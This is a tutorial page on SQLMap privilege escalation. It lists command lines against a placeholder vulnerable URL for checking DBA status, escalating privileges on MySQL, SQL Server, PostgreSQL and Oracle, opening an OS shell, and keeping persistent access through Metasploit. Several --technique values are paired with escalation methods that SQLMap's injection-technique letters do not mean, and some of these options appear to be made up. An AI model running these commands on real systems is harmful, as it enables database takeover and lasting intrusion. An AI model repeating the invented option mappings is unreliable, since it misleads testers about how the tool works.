Privilege Escalation

Learn how to perform privilege escalation using SQLMap's advanced techniques

SQLMap provides capabilities to check for and potentially exploit privilege escalation opportunities in various database management systems. These techniques can help identify and leverage excessive privileges during authorized security assessments.

Checking Current Privileges

Identifying Database User Privileges

To check the current database user's privileges:

sqlmap -u "http://www.example.com/vuln.php?id=1" --privileges

This command displays all privileges assigned to the current database user.

Checking DBA Status

To verify if the current user has database administrator privileges:

sqlmap -u "http://www.example.com/vuln.php?id=1" --is-dba

This returns a boolean result indicating whether the current user has DBA privileges.

Automated Privilege Escalation

SQLMap can attempt to automatically escalate privileges:

sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc

This command attempts various privilege escalation techniques based on the detected DBMS.

DBMS-Specific Techniques

MySQL Privilege Escalation

For MySQL, SQLMap can attempt:

  1. User-Defined Function (UDF) injection:
sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --dbms=mysql --technique=U
  1. MOF (Managed Object Format) exploitation on Windows systems:
sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --dbms=mysql --technique=M

Microsoft SQL Server Privilege Escalation

For SQL Server, SQLMap can attempt:

  1. xp_cmdshell re-enabling:
sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --dbms=mssql
  1. SQL Server Agent job creation (requires specific privileges):
sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --dbms=mssql --technique=Q

PostgreSQL Privilege Escalation

For PostgreSQL, SQLMap can attempt:

  1. Custom function creation:
sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --dbms=postgresql
  1. Large object exploitation:
sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --dbms=postgresql --technique=L

Oracle Privilege Escalation

For Oracle, SQLMap can attempt:

  1. PL/SQL injection:
sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --dbms=oracle
  1. Java class loading:
sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --dbms=oracle --technique=J

Gaining System Access

After privilege escalation, you can attempt to gain system access:

sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --os-shell

This combines privilege escalation with OS shell access attempts.

Maintaining Access

To establish persistent access after privilege escalation:

sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --os-pwn

This attempts to create a more persistent connection using Metasploit integration.

Troubleshooting Privilege Escalation

If privilege escalation attempts fail:

  1. Verify the injection point supports stacked queries
  2. Check if the database user has sufficient base privileges
  3. Examine if security controls are preventing escalation
  4. Try different techniques with the --technique parameter
  5. Use verbose mode (-v) to get more detailed information about the attempts

Remember that privilege escalation success depends on:

  • The specific DBMS version and configuration
  • Existing security patches and controls
  • The initial privileges of the compromised database user
  • Operating system security settings